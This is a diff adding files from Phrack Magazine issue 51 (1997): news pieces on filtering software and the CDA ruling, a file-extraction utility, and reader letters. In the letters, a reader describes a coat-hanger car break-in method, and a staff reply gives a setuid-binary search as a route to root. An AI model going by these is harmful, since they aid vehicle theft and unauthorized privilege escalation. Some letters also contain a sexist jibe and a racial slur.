+If the ludicrous quality of this situation isn't glaring enough,
+consider that one of Cyber Patrol's partners, CompuServe, promoted the
+acquisition of electronic copies of the Unabomber Manifesto after it
+published by the Post. And these copies weren't subject to any
+restrictions that would hinder children from reading them. In fact,
+I've never met anyone from middle-class America who said, "Darn those
+irresponsible fiends at the Post! Now my children will be inspired to
+retreat to the woods, write cryptic essays attacking techno-society,
+and send exploding parcels to complete strangers."
+
+Have you?
+
+So, will somebody explain to me how banning the Unabomber Manifesto,
+the ASC's Critical Criminology home page, and Crypt Newsletter
+protects children from smut and indecency? That's a rhetorical
+question.
+
+Cyber Patrol is strongly marketed to public libraries, and has been
+acquired by some, in the name of protecting children from Net
+depravity.
+
+Funny, I thought a public library would be one of the places you'd be
+more likely to find a copy of the Unabomber Manifesto.
+
+0x16>-------------------------------------------------------------------------
+ 
+Title: Some humor on media hacks and hackers
+Source: Defcon Mailing List
+Author: George Smith / Crypt Newsletter
+
+In as fine a collection of stereotypes as can be found, the
+Associated Press furnished a story on July 14 covering the annual
+DefCon hacker get together in Las Vegas. It compressed at least
+one hoary cliche into each paragraph.
+
+Here is a summary of them.
+
+The lead sentence: "They're self-described nerds . . . "
+
+Then, in the next sentence, "These mostly gawky, mostly male
+teen-agers . . . also are the country's smartest and slyest computer
+hackers."
+
+After another fifty words, "These are the guys that got beat up in
+high school and this is their chance to get back . . . "
+
+Add a sprinkling of the obvious: "This is a subculture of
+computer technology . . ."
+
+Stir in a paraphrased hacker slogan: "Hacking comes from an
+intellectual desire to figure out how things work . . ."
+
+A whiff of crime and the outlaw weirdo: "Few of these wizards will
+identify themselves because they fear criminal prosecution . . .  a
+25-year-old security analyst who sports a dog collar and nose ring, is
+cautious about personal information."
+
+Close with two bromides that reintroduce the stereotype:
+
+"Hackers are not evil people. Hackers are kids."
+
+As a simple satirical exercise, Crypt News rewrote the Associated
+Press story as media coverage of a convention of newspaper editors.
+
+It looked like this:
+
+LAS VEGAS -- They're self-described nerds, dressing in starched
+white shirts and ties.
+
+These mostly overweight, mostly male thirty, forty and
+fiftysomethings are the country's best known political pundits,
+gossip columnists and managing editors. On Friday, more than 1,500 of
+them gathered in a stuffy convention hall to swap news and network.
+
+"These are the guys who ate goldfish and dog biscuits at frat parties
+in college and this is their time to strut," said Drew Williams,
+whose company, Hill & Knowlton, wants to enlist the best editors
+and writers to do corporate p.r.
+
+"This is a subculture of corporate communicators," said Williams.
+
+Journalism comes from an intellectual desire to be the town crier
+and a desire to show off how much you know, convention-goers said.
+Circulation numbers and ad revenue count for more than elegant prose
+and an expose on the President's peccadillos gains more esteem from
+ones' peers than klutzy jeremiads about corporate welfare and
+white-collar crime.
+
+One group of paunchy editors and TV pundits were overheard
+joking about breaking into the lecture circuit, where one
+well-placed talk to a group of influential CEOs or military
+leaders could earn more than many Americans make in a year.
+
+Few of these editors would talk on the record for fear of
+professional retribution. Even E.J., a normally voluble
+45-year-old Washington, D.C., editorial writer, was reticent.
+
+"Columnists aren't just people who write about the political
+scandal of the day," E.J. said cautiously. "I like to think of
+columnists as people who take something apart that, perhaps,
+didn't need taking apart."
+
+"We are not evil people. We're middle-aged, professional
+entertainers in gray flannel suits."
+
+0x17>-------------------------------------------------------------------------
+
+Title: Cellular Tracking Technologies
+Source: unknown
+Author: unknown
+
+A recent article from the San Jose Mercury News by Berry Witt ("Squabble
+puts non-emergency phone number on hold") raises several important
+questions -- questions I think are relavant to the CUD's readership...
+
+Does anybody remember the FBI's request that cell phone companies must
+build in tracking technology to their systems that allows a person's
+position to be pin pointed by authorities?  That suggested policy resulted
+in a flurry of privacy questions and protests from the industry, suggesting
+such requirements would force them to be uncompetitive in the global
+marketplace.  The article, dated July 20, (which was focused on 911
+cellular liability issues) suggests federal authorities may have worked out
+an end run around the controversy.  The article states:
+
+ "The cellular industry is working to meet a federal requirement that by
+next spring, 911 calls from cellular phones provide dispatchers the
+location of the nearest cell site and that within five years, cellular
+calls provide dispatchers the location of the caller within a 125-meter
+radius. "
+
+On its face, this seems reasonable and it is a far cry from the real time
+tracking requirements of any cell phone that is turned on (The FBI's
+original request).  But by next spring, this tracking system will be in
+place and on line.  I have heard no public debate about the privacy
+implications regarding this "Federal Requirement", nor has there been any
+indication that this information will be restricted to 911 operators.
+
+Will this information be available to law enforcement officials if they
+have a warrant?  If they don't have a warrant?  Will this information be
+secured so enterprising criminals won't have access to it?  Exactly WHAT
+kind of security is being implemented so it WON'T be accessible to the
+general public.
+
+This smacks of subterfuge.  By cloaking the cellular tracking issue in the
+very real issue of the 911 location system, the federal government and law
+enforcement agencies have circumvented the legitimate privacy questions
+that arose from their initial Cellular tracking request.
+
+0x18>-------------------------------------------------------------------------
+
+Title: Court Mixes Internet Smut Provision
+Source: Associated Press
+Author: unknown
+Date: June 26, 1997
+
+WASHINGTON (AP) -- Congress violated free-speech rights when it
+tried to curb smut on the Internet, the Supreme Court ruled today.
+In its first venture into cyberspace law, the court invalidated a
+key provision of the 1996 Communications Decency Act.
+
+Congress' effort to protect children from sexually explicit
+material goes too far because it also would keep such material
+from adults who have a right to see it, the justices unanimously
+said.
+
+The law made it a crime to put adult-oriented material online
+where children can find it. The measure has never taken effect
+because it was blocked last year by a three-judge court in
+Philadelphia.
+
+``We agree with the three-judge district court that the statute
+abridges the freedom of speech protected by the First Amendment,''
+Justice John Paul Stevens wrote for the court.
+
+``The (Communications Decency Act) is a content-based regulation
+of speech,'' he wrote. ``The vagueness of such a regulation raises
+special First Amendment concerns because of its obvious chilling
+effect on free speech.''
+
+``As a matter of constitutional tradition ... we presume that
+governmental regulation of the content of speech is more likely to
+interfere with the free exchange of ideas than to encourage it,''
+Stevens wrote.
+
+Sexually explicit words and pictures are protected by the
+Constitution's First Amendment if they are deemed indecent but not
+obscene.
+
+
+
+
+0x1>-------------------------------------------------------------------------
+
+Book Title: Underground
+Poster: Darren Reed
+
+A few people will have heard me mention this book already, but I think
+there are bits and pieces of this book which will surprise quite a few
+people.  Most of us are used to reading stories about hacking by the
+people who did the catching of the hackers...this one is an ongoing
+story of the local hacker scene...with not so local contacts and exploits.
+
+Some of the important things to note are just how well they do work
+together, as well as competing with each other and what they do when
+they get pissed off with each other.  Meanwhile most of the white hats
+are too busy trying to hoard information from the other white hats...
+
+Having been on the "victim" side in the past, it is quite frustrating
+when someone you've worked to have arrested gets off with a fine.  Most
+of us would agree that they should be locked up somewhere, but
+according to what's in the book, most of them are suffering from either
+problems at home or other mental disorders (including one claim in court
+to being addicted to hacking).  Anyone for a "Hackers Anonymous Association"
+for help in drying out from this nefarious activity ?  At least in one
+case documented within the perpetrators get sentenced to time behind bars.
+
+It's somewhat comforting to read that people have actually broken into
+the machines which belong to security experts such as Gene Spafford and
+Matt Bishop, although I'd have preferred to have not read how they
+successfully broke into the NIC :-/  Don't know about you, but I don't
+care what motives they have, I'd prefer for them to not be getting inside
+machines which provide integral services for the Internet.
+
+For all of you who like to hide behind firewalls, in one instance a hacker
+comes in through X.25 and out onto the Internet.  Nice and easy 'cause
+we don't need to firewall our X.25 connection do we ? :-)
+
+Oh, and just for all those VMS weenies who like to say "We're secure,
+we run VMS not Unix" - the first chapter of the book is on a VMS worm
+called "WANK" that came close to taking the NASA VMS network completely
+off air.  I wonder how long it will take for an NT equivalent to surface...
+
+All in all, a pretty good read (one from which I'm sure hackers will learn
+just as much from as the rest of us).
+
+The book's details are:
+Title: UNDERGROUND - Tales of Hacking, madness and obsession on the
+       Electronic Frontier
+ISBN 1-86330-595-5
+Author: Suelette Dreyfus
+Publisher: Random House
+Publisher's address: 20 Alfred St, Milsons Point, NSW 2061, Australia
+Price: AUS$19.95
+
+before I forget, the best URL for the book I've found is:
+
+http://www.underground-book.com (http://underground.org/book is a mirror)
+
+0x2>-------------------------------------------------------------------------
+ 
+Book Title: "Hackers"
+Poster: Paul Taylor    P.A.Taylor@sociology.salford.ac.uk
+
+There's an open invite for people to contact me and discuss the
+above and/or anything else that they think is relevant/important.
+
+Below is a brief overview of
+the eventual book's rationale and proposed structure.
+
+Hackers: a study of a technoculture
+
+Background
+
+"Hackers" is based upon 4 years PhD research conducted from
+1989-1993 at the University of Edinburgh.  The research focussed
+upon 3 main groups: the Computer Underground (CU); the Computer
+Security Industry (CSI); and the academic community.  Additional
+information was obtained from government officials, journalists
+etc.
+
+The face-to-face interview work was conducted in the UK and the
+Netherlands.  It included figures such as Rop Gongrijp of
+Hack-Tic magazine, Prof Hirschberg of Delft University, and
+Robert Schifreen.  E-mail/phone interviews were conducted in
+Europe and  the US with figures such as Prof Eugene Spafford of
+Purdue Technical University, Kevin Mitnick, Chris Goggans and
+John Draper.
+
+Rationale
+
+This book sets out to be an academic study of the social
+processes behind hacking that is nevertheless accessible to a
+general audience.  It seeks to compensate for the "Gee-whiz"
+approach of many of the journalistic accounts of hacking.  The
+tone of these books tends to be set by their titles: The Fugitive
+Game; Takedown; The Cyberthief and the Samurai; Masters of
+Deception - and so on ...
+
+The basic argument in this book is that, despite the media
+portrayal, hacking is not, and never has been, a simple case of
+"electronic vandals" versus the good guys: the truth is much more
+complex.  The boundaries between hacking, the security industry
+and academia, for example, are often relatively fluid.  In
+addition, hacking has a significance outside of its immediate
+environment: the disputes that surround it symbolise society's
+attempts to shape the values of the informational environments we
+will inhabit tomorrow.
+
+
+Book Outline
+
+Introduction - the background of the study and the range of
+contributors
+
+Chapter 1 - The cultural significance of hacking: non-fiction and
+fictional portrayals of hacking.
+
+Chapter 2 - Hacking the system:  hackers and theories of technological change.
+
+Chapter 3 - Hackers: their culture.
+
+Chapter 4 - Hackers: their motivations
+
+Chapter 5 - The State of the (Cyber)Nation: computer security weaknesses.
+
+Chapter 6- Them and Us: boundary formation and constructing "the other".
+
+Chapter 7 - Hacking and Legislation.
+
+Conclusion
+
+
+0x1>-------------------------------------------------------------------------
+ 
+Convention: Cybercrime Conference Announcement
+Date: Oct 29 - 31
+
+Cybercrime; E-Commerce & Banking; Corporate, Bank & Computer
+Security; Financial Crimes and Information Warfare Conference
+will be held October 29, 30, & 31, 1997 (Washington, D.C.) and
+November 17 & 18 (New York City) for bankers, lawyers,
+information security directors, law enforcement, regulators,
+technology developers/providers.
+
+Responding to the global threat posed by advancing technology,
+senior level decision makers will join together to share remedies
+and solutions towards the ultimate protection of financial and
+intellectual property; and against competitive espionage and
+electronic warfare.  An international faculty of 30 experts will
+help you protect your business assets, as well as the information
+infrastructure at large.
+
+There will also be a small technology vendor exhibition.
+
+Sponsored by Oceana Publications Inc. 50 year publisher of
+international law, in cooperation with the Centre for
+International Financial Crimes Studies, College of Law,
+University of Florida, and Kroll Associates, a leading
+investigative firm.  For more information call
+800/831-0758 or
+914/693-8100; or e-mail: Oceana@panix.com.
+
+http://www.oceanalaw.com/seminar/sem_calendar.htm
+
+0x2>-------------------------------------------------------------------------
+
+Convention: Computers & The Law IV Symposium
+Date: October 6-9, Boston
+
+Computers & The Law IV is the only event to bring together corporate
+decision-makers, computer professionals and legal experts to discuss
+Internet
+and Web technology in the eyes of the law.  This conference provides a
+forum and educational opportunities for all those interested in
+keeping their system investment safe and within the law.
+Topics will include:
+* Corporate liablity on the Internet
+* Internet risk management in the enterprise
+* Hiring a SysAdmin you can trust
+* Legal risks of Internet commerce
+* Establishing a fair-use policy
+* Prosecuting system intruders
+* Communicating with your SysAdmin
+* Understanding copyright law
+* Assessing your exposure to hackers
+* Employee privacy vs. owner rights
+... and much more!
+
+               FOR MORE INFORMATION CONTACT
+ The Sun User Group  * 14 Harvard Ave, 2nd Floor * Allston, MA 02134
+     (617)787-2301 * conference@sug.org * http://www.sug.org/CL4
+
+
+----[  EOF
diff --git a/phrack51/17.txt b/phrack51/17.txt
new file mode 100644
index 0000000..e888a12
--- /dev/null
+++ b/phrack51/17.txt
@@ -0,0 +1,110 @@
+---[  Phrack Magazine   Volume 7, Issue 51 September 01, 1997, article 17 of 17
+
+
+-------------------------[  Phrack Magzine Extraction Utility
+
+
+--------[  Phrack Staff
+
+    This time around, you have the option of using the C version of extract, 
+or the PERL version, contributed by Daos.
+
+
+---------------------8<------------CUT-HERE----------->8---------------------
+ 
+/*  extract.c by Phrack Staff and sirsyko 
+ *
+ *  (c) Phrack Magazine, 1997 
+ *
+ *  Extracts textfiles from a specially tagged flatfile into a hierarchical 
+ *  directory strcuture. Use to extract source code from any of the articles 
+ *  in Phrack Magazine (first appeared in Phrack 50).
+ *
+ *  gcc -o extract extract.c
+ *  
+ *  ./extract filename   
+ */   
+
+ 
+#include <stdio.h>
+#include <sys/stat.h>
+#include <string.h>
+
+int main(int argc, char **argv){ 
+
+    char *s="<++> ",*e="<-->",b[256],*bp; 
+    FILE *f,*o = NULL; 
+    int l, n, i=0; 
+
+    l = strlen(s); 
+    n = strlen(e); 
+
+    if(argc<2) {
+        printf("Usage: %s <inputfile>\n",argv[0]);
+        exit(1); 
+    }
+
+    if(! (f=fopen(argv[1], "r"))) {
+        printf("Could not open input file.\n");
+	exit(1);
+    }
+
+    while(fgets(b, 256, f)){ 
+
+        if(!strncmp (b, s, l)){ 
+	    b[strlen(b)-1] = '\0'; 
+
+	    if((bp=strchr(b+l+1,'/')))
+	        while (bp){ 
+		    *bp='\0';
+		    mkdir(b+l, 0700); 
+		    *bp='/';
+		    bp=strchr(bp+1,'/'); 
+		}
+	    if((o = fopen(b+l, "w"))) 
+	        printf("- Extracting %s\n",b+l);
+	    else {
+		printf("Could not extract '%s'\n",b+l);
+		exit(1);
+	    }
+	} 
+        else if(!strncmp (b, e, n)){
+	    if(o) fclose(o);
+	    else {
+	        printf("Error closing file.\n");
+		exit(1);
+	    }
+        } 
+        else if(o) {
+            fputs(b, o);
+            i++;
+        }
+    }
+    if(!i) printf("No extraction tags found.\n");
+    return(0);
+}
+
+---------------------8<------------CUT-HERE----------->8---------------------
+
+# Daos <daos@nym.alias.net>
+
+<++> extract.pl
+#!/bin/sh -- # -*- perl -*- -n
+eval 'exec perl $0 -S ${1+"$@"}' if 0;
+
+$opening=0;
+
+if (/^\<\+\+\>/) {$curfile = substr($_ , 5); $opening=1;};
+if (/^\<\-\-\>/) {close ct_ex; $opened=0;}; 
+if ($opening) {                        
+        chop $curfile;                 
+        $sex_dir= substr( $curfile, 0, ((rindex($curfile,'/'))) ) if ($curfile =~ m/\//);
+        eval {mkdir $sex_dir, "0777";}; 
+        open(ct_ex,">$curfile"); 
+        print "Attempting extraction of $curfile\n";
+        $opened=1; 
+}
+if ($opened && !$opening) {print ct_ex $_}; 
+<-->
+
+----[  EOF
diff --git a/phrack51/2.txt b/phrack51/2.txt
new file mode 100644
index 0000000..a128a65
--- /dev/null
+++ b/phrack51/2.txt
@@ -0,0 +1,1146 @@
+---[  Phrack Magazine   Volume 7, Issue 51 September 01, 1997, article 02 of 17
+
+
+-------------------------[  P H R A C K     51     L O O P B A C K
+
+
+--------[  Phrack Staff
+
+
+
+0x1>-------------------------------------------------------------------------
+  
+Issue 50 proves that Phrack _is_ back, and better than ever.
+Congratulations to you and the rest of the Phrack staff for putting
+together what I think is by far the most informative issue to date.  The
+quality of the articles and code (YES! Lots of code!) reflects the hard
+work and commitment that obviously went in to this issue.  I could go on,
+but I'm all out of lip balm.
+
+Thank you!
+_pip_
+
+
+    [ Thank you.  We aim to please. ]
+
+0x2>-------------------------------------------------------------------------
+
+    { ...Bugtraq Phrack 50 announcement deleted... }
+
+So What?
+Who cares? get this crap off of the mailing list.
+phrack is as much trash as 2600 or any other 
+little idiot magazine.
+
+
+    [ Thank you.  We aim to please. ]
+
+0x3>-------------------------------------------------------------------------
+
+juggernaut is way cool, man.
+
+minor bug: you dont unset IFF_PROMISC on exit, so it's not terribly stealthy,
+but it's no big deal to fix. 
+
+anyway. cool.
+
+.techs.
+
+
+    [ Although Juggernaut is *not* meant to be a 'covert' program you are 
+    completely right about that.  I should unset promiscuous mode when the 
+    program exits.  In fact, in version 1.2 (patchfile available in this
+    issue) I include this very thing. ]
+
+0x4>-------------------------------------------------------------------------
+
+Hi!
+ I've got the p50.tgz and well, played a little with jugernaut.
+It's realy cool but:
+	1) It doesn't compile so clean. You've forgot to #include
+<linux/netdevice.h> before <linux/if_arp.h>
+ 	2) The spy connection part is not quite cool because you 
+sniff and dump all the stuff that is comeing from the dest. port 
+and dest. host ...
+ So if U try 2 spy say:
+193.226.34.223 [4000] 193.226.62.1 [23]
+U spy in fact all the stuff that is comeing from 193.226.62.1 [23] for
+ALL the conn. made to 193.226.62.1 on the 23 (telnet) port.
+ This will cause a cool mess on the screen.
+I've tried 2 restrict the spying by introduceing a new cond.
+iphp->daddr==target->saddr in net.c ... it brocked the spy routine
+
+Maybe U'll fix somehow that thing..
+
+All my best regards,
+	Sandu Mihai
+
+
+    [ <linux/if_arp.h> includes <linux/netdevice.h>.  The compilation of the
+    program should go smoothly on any linux 2.0.x based system.  Version 1.2 
+    also fixes the TCP circuit isolation problem you allude to... ] 
+
+0x5>-------------------------------------------------------------------------
+
+Thanks!
+
+This is a very impressive tool! Brilliant work!
+
+Thank you,
+
+--Craig
+
+
+    [ Thank you. ] 
+
+0x6>-------------------------------------------------------------------------
+
+I'm just writing this to say thanx for putting out such a kickass publication.
+Down here in 514 it's fuckin dead, you mention hacking and half the people
+don't have a clue what Unix is.It's fuckin pathetic, but i'm glad to say
+that your mag has helped a lot and i look forward to future issues, you guys 
+really do make a difference in the hacking community.  Thanx.  
+
+Snake Eyes 
+
+    [ Amen to that. ]
+
+0x7>-------------------------------------------------------------------------
+
+Hi! =8)
+
+Why don't you (at Phrack) compile an updated Pro-Phile on known H/P
+Groups like the one on issue #6 ?
+So we - the readers - can know something more about the ACTUAL scene
+(but perhaps it's not worth - ppl's sick of all that 3l33t d00dz ;)
+
+I really appreciated that dox & srcs on spoofing, D.O.S., etc.
+HIGH technical quality, sources, articles, news.... and it's free! :P
+Ahh that's life! ;)
+
+However, great job with the latest Phrack issues.
+To quote a friend of mine (talking of Phrack Magazine)...
+
+> It's improved a lot with Deamon9 in command....
+
+K, that's all.
+**PHRACK RULEZ!** (I had to say that :)
+Oh... and sorry for my english!
+
+Cya....
+
+-Axl-   
+
+    [ Not a bad idea.  Perhaps someone would like to do an article on
+    the existing groups out there for P52? ]
+
+
+0x8>-------------------------------------------------------------------------
+
+I would like to know what you suggest to get me headed in the right
+direction reguarding the compromise of computers on the internet.
+any information that you would be able to spare would be most appreaciated.
+atomicpunk.
+
+    [ It's *all* about compromise.  It's something you have to do.  Be fair to 
+    them.  Listen to them.  Don't shut them out of your life.  They are 
+    wonderful creatures...  It's a give and take thing and sometimes, yes, you 
+    *have* to compromise -- that's part of having a mature relationship. ]
+
+    
+0x9>-------------------------------------------------------------------------
+
+I recently locked into my car so i called a friend to come help me 
+when the slim jim was no help he decided to try another less known
+method.
+
+We simply took a stiff metal coat hanger and straightened it out and
+made a small loop in it then we took a small speaker wire about 3 feet
+long and tied a loop into one end so it would slide to make the loop 
+smaller or larger.
+
+Then you take the wire and run it in through the loop in the hanger
+and pry the top edge of the car door open and slide both looped ends
+through holding onto the unlooped ends.
+ 
+then you use the hanger to position the loop in the speaker wire
+around the door lock once you have the loop into position you hold
+the hanger steady and gradualy pull the loop tight around the lock 
+once the loop is tight you just pull up on the hanger.
+
+This works on most all vehicles with top door locks and with a little 
+prep. and practice can be done in under 2 mins. also its less 
+conspicious and easier to get than a slim jim. and they are cheap 
+so no one care to toss the out after breaking into an entire lot of cars.
+
+Hope you found this phile worth while
+C'ya 
+The Stony Pony
+
+
+    [ Aspiring young car thieves among us thank you; however if you
+      lock yourself in the car again, you might try unlocking the door
+      manually. ] 
+
+0xa>-------------------------------------------------------------------------
+
+                   HOW YOU KNOW YOUR A TRY HARD HACKER
+                  -------------------------------------
+                  
+                    
+                           By [Xtreme]
+
+
+I just wrote this to tell all you try hard hackers something.
+
+1) You goto other hacker pages on the web.
+2) You think loading a program that waz made by a hacker is hacking.
+3) The only thing you do is get the lastest passwd file from your isp.
+4) You goto channels like #hack and ask for passwd files.
+5) You don't know where to get warez.
+6) You always telnet to hosts and type
+
+login: root
+password: root
+
+and stuff like that.
+
+7) You brag about how you are a hacker.
+8) You don't know C.
+9) Your a girl.
+10) You don't know what's a shell.
+11) You don't know what Linux, FreeBSD and all those other UNIX's are.
+12) You don't have a UNIX OS.
+13) You think when using IRC war scripts, your hacking.
+14) Asking how to hack other people's computer.
+15) You try cracking a shadowed passwd file.
+16) You don't know if a passwd file is shadowed or not.
+17) You ask what is a T1.
+18) You ask how to email bomb and you think email bombing is a form of hacking.
+19) Your learning BASIC language.
+20) You think you can get into hacking straight away.
+21) You don't know how to set up an eggdrop bot.
+22) You think .mil stands sites stand for a country.
+
+
+    [ That is without a doubt, the dumbest thing I have ever read in my life.
+    Not only do I award you no points, but we are all now dumber having read 
+    that.  May God have mercy on your soul. ]
+
+0xb>-------------------------------------------------------------------------
+
+What command do I use to make you denial of service package work?
+
+
+    [ You hit yourself in the head with a hammer. ]
+
+0xc>-------------------------------------------------------------------------
+
+I was scanning the 413 xxx 99XX range and I found some #'s.  I have
+no idea what they do.  I was wondering if you could help me out.
+Maybe call them and see what you find or someting.
+
+(413) xxx-99xx
+(413) xxx-99xx
+(413) xxx-99xx		These are all fax #s, I think
+(413) xxx-99xx
+
+(413) xxx-99xx		goes beep beep beep
+
+(413) xxx-99xx		goes beeeep
+
+(413) xxx-99xx		auto foward I think
+
+(413) xxx-99xx 		goes beeep beeep
+
+
+    [ I tried calling these but I got no answer.  Maybe the 'X' on my phone
+      is case sensitive? ]
+
+0xd>-------------------------------------------------------------------------
+
+Sir,
+I would like to know how could I get root permission from a simple user.
+I have read that this can be accomplished by setuid programs, and I have read
+an article describing the way this can be done in Phrack Magazine. Still I
+couldn't gain root access. I would be very interested in finding ways of doing
+this on Irix 5.2 or Solaris 2.5. If you know anything about this, please 
+send me an e-mail. If you know any resources on the Web that details the use
+of setuid programs in order to get root access, please tell me.
+
+
+    [ P49-14 ]
+
+0xe>-------------------------------------------------------------------------
+
+>AND FOR THE LOVE OF GOD, SOMEONE NOTIFY MITCH KABAY...!<
+
+Mich, not Mitch.  "Mich" is short for "Michel."
+
+
+M. E. Kabay, PhD, CISSP (Kirkland, QC)
+Director of Education
+National Computer Security Association (Carlisle, PA)
+http://www.ncsa.com
+
+    [ No, Mike is short for Michael. ]
+
+0xf>-------------------------------------------------------------------------
+
+Your zine is the best
+Please send it to Psycho Al1@aol.com
+  
+The Psychotic Monk
+
+PS:Aohell rulez
+
+
+    [ You are an idiot. ]
+
+0x10>-------------------------------------------------------------------------
+
+Hi, Phrack people!
+
+Great job on issue 50! Nice magazine. Article 'bout TTY hijacking is really 
+superb.
+
+I have just one question to you. Is there any holes on target system in this
+situation? There's a server, running freeBSD 2.1.5, with a shadowed passwords.
+I've got a dial-up account on that machine as a simple user. What bugs can I 
+use for having root privileges?
+
+Best wishes from Ukraine!!                                         OmegA
+
+
+    [ find / -perm -4000 -print ]
+
+0x11>-------------------------------------------------------------------------
+
+hello... long-time reader, first-time writer:
+
+	i know that all "submissions" are to be encrypted... and i should be
+	encrypting anyways, but i'll make it quick ... besides, this isn't
+	really a "submission..."
+
+	congrats on reaching the 50th issue mark, and congrats on an
+	excellent ish!
+
+	i just a quick question.  i would like to reprint the <soapbox>
+	for issue #50 on my web page, with a hypertext link to the
+	Official Phrack Homepage (http://www.fc.net/phrack/ - correct?).
+	I think it says brings up some important points, and since it's
+	copywrited, and you sren't losers, i'd ask you (it's not like a
+	simple copywrite has stopped anyone before)!
+
+		thanks,
+		lenny
+
+
+    [ A simple copyright may not stop people, but the simple restitution
+    remanded by courts might.  However, go ahead and put a hypertext link.  
+    The official webpage will be at phrack.com/net/org, SOON. ]
+
+0x12>-------------------------------------------------------------------------
+
+     In Volume Four, Issue Forty-One, File 3 of 13, Supernigger was featured
+in your Phrack Pro-Phile.  Whatever happened to him?  Did he "grow up and
+get a real job" or is he still lurking around?
+
+     - Styx
+
+
+    [ Both. ]
+
+0x13>-------------------------------------------------------------------------
+
+People @ Phrack:
+
+ In Phrack #50 in the file 'Linenoize' Khelbin wrote an article about remote
+BBS hacking, namely using Renegade's default 'PKUNZIP -do' command overwrite
+the userbase with your own ...
+
+For some strange reason, while renegade is booted, and if it runs PKUNZIP -do
+the procedure will NOT work... but the procedure DOES work when Renegade is
+down at the Dos Prompt..?
+
+Does Renegade extract files into memory or something while testing for
+integrity? -8) .. I tried this out on 10-04, 5-11 and even
+04-whatever-the-fuck-that-version-was and it didn't work.. I think Khelbin
+needs help for his chronic crack addiction since I can't find any way possible
+to get his article to work..
+
+op: Taos BBS
+
+~~~ Telegard v3.02
+
+
+    [ We dunno.  Anyone else have an answer? ]
+
+0x14>-------------------------------------------------------------------------
+
+Regarding Xarthons submission about Linux IP_MASQ in Phrack 50...
+
+The masquerading code is not designed for security. Hardwiring RFC1918
+addresses into the IP_MASQ code is not a clever idea for two reasons:
+
+1) It diminishes the usefulness of the code. I have used masquerading to
+keep things running when my company changed internet providers. I
+masqueraded our old _valid_ IP range. Other people may come up with
+other valid uses, like providing redundancy through two ISPs.
+2) The masquerading code is part of the Linux packet filter, which can
+certainly be configured to prevent spoofing, a quite a bit more.
+
+If the static packet filter and the masquerading code are used together
+they can provide as much security as a 'dynamic' filtering firewall like
+Firewall-1 in many cases. A very short 'HOW-TO':
+
+1) Put spoofing filters on all interfaces. Only allow incoming packets
+to the external interface if the destination address is that of the
+external interface (that's the address the masquerading code inserts as the
+source address of outgoing packets).
+
+2) Insert rule(s) in the forwarding filter to masquerade your outgoing
+packets. You do not need to route incoming replies to masqueraded
+packets, that happens auto-magically. Deny everything else (and _log_).
+
+3) Make sure the gateway does not run anything that leaves you
+vulnerable. Don't run NFS, the portmapper etc. Update sendmail, bind to
+the latest versions if you run them.
+
+4) Disable telnet, and use 'ssh' for maintenance. If you must support
+incoming telnet connections through the firewall install the TIS firewall
+toolkit, and use one-time passwords.
+
+5) Run 'COPS', 'Tripwire'.
+
+6) Read a good book about Internet security, and make sure you
+understand all the issues involved before you configure _any_ firewall,
+even one with a GUI and a drool-proof manual.
+
+I hope this is useful to some people.  
+
+Ge' Weijers (speaking for myself only) 
+
+0x15>-------------------------------------------------------------------------
+
+You write in P49-06:
+
+  ...  The only sure way to destroy this
+  channel is to deny ALL ICMP_ECHO traffic into your network.
+
+No.  It suffices to clear the content of the packets
+when passing the firewall.
+
+
+ralf
+
+    [ True enough.  However, by doing this you remove the RTT info from
+    the ICMP echos which will break some implementations which rely on it. ]
+
+0x16>-------------------------------------------------------------------------
+
+Hi, Im a Wannabe, maybe you would call me and idiot.
+Where do you guys hang out, IRC? Wich channel, #supreme? Wich server?
+Know any good trix for me how to learn more about hacking?
+
+Please answer my letter, I know that you get lots of letters, but
+please!!
+
+    [ EFNet, #phrack ]
+
+0x17>-------------------------------------------------------------------------
+
+You cant realy say that IRC is for loosers cuz in Phrack 50 I saw an
+article with some text taken from IRC, and you were logged in.
+
+    [ We are losers.  Ergo, yes we can. ]
+
+Which good hack books, UNIX books or things like that do you recommend.
+
+Thank You For An Answer!!
+
+    [ Anything Addison Wesley or ORA.  Also, many of the PTR/PH books. ]
+
+0x18>-------------------------------------------------------------------------
+
+I am writing to inquire about the fate of Pirate Magazine
+and how I might contact it's creators. It seems to have been out of
+circulation since 1990 and I was hoping to look at possibly organizing
+some kind of initiative to revive this excellent publication. I thought
+first to turn to Phrack magazine. Thanx for your time.
+
+Joong Gun
+
+    [ Anyone have any information? ]
+
+0x19>-------------------------------------------------------------------------
+
+Hello, 
+
+            I just got Phrack 50 and loved it....It is the first one I've
+got. I was wondering if you guys know about any other newsletters or
+magazines that are sent to your e-mail address or you can get off the web on
+a regular basis, like Phrack. thanX
+
+    [ Other magazines come and go on a pretty regular basis.  Phrack is
+    eternal. Phrack is all you need. ]
+
+0x1a>-------------------------------------------------------------------------
+
+Please help me.  If I can't join your club, please let me learn from you.  I
+am interested in both Program hacking and remote access.
+
+Thanks.
+
+quattro
+
+    [ You join our club if you can find our secret clubhouse. ]
+
+0x1b>-------------------------------------------------------------------------
+
+hi. This is from a guy you probably will never hear of again, and
+definantly have never heard of already. I wanna ask you a question. At
+my school, people write crap on their backpacks with witeout. I have
+never done this for 2 reasons
+
+1) I dont wanna be grouped with the poseur metalheads, etc who write
+"Pantera" and "666" and "Satan" etc but cannot name a song of thiers,
+and/or go to church....
+
+2) I dont wanna be grouped with the wanna be hackers who write stuff
+like Anarchy symbols, "Aohell" "Kaboom" and the such, because thats just
+plain lame. You have to feel sorry for people who think they are elite
+because they can mailbomb somebody.
+
+Another reason I have never written anything is I havent found anything
+worht advertising. Now i have, I wanna write "The guild" or something to
+that extennt maybe "r00t" or something. I have not done this for i do
+not want to piss you off (indirectly something may get to you about it.
+It could happen, remember the 6 degrees of seperation? hehehe). If this
+is ok with you, lemme know please. (cad@traveller.com) Also, if your
+wondering why im mailing this to you alone,  it is because you are a
+fucking baddass. heh. Well, lemme know whenever ok? thanks.
+
+(I know i have an absence of punctuation, i'm in a hurry and I have
+homework)
+
+
+    [ You have our permission to write r00t on your backpack. ] 
+
+0x1c>-------------------------------------------------------------------------
+
+
+yes i want to learn how to hack and need to learn fast
+Js444 told me you can help
+will repay BIG
+thanks
+ 
+    [  How big?  ]
+
+0x1d>-------------------------------------------------------------------------
+
+
+I sent this from your hoime page...is it X-UIDL?  I dunno, it's 4 AM
+anyway
+
+um oh, keep in mind that ur response (if made) to this may be dumped to
+#hack printed in the next Citadel knockoff or whatevrr
+
+I was just like thinking oh, I was thinking "I don't have an Irix
+sniffer!"...actually my thoughts don't have quotes around them it was
+more like
+
+~o- all the Irix sniffers I have suck -o~
+
+and then theres like Irix 4, 5, 6.  Bah.  And like sniffit sucks and
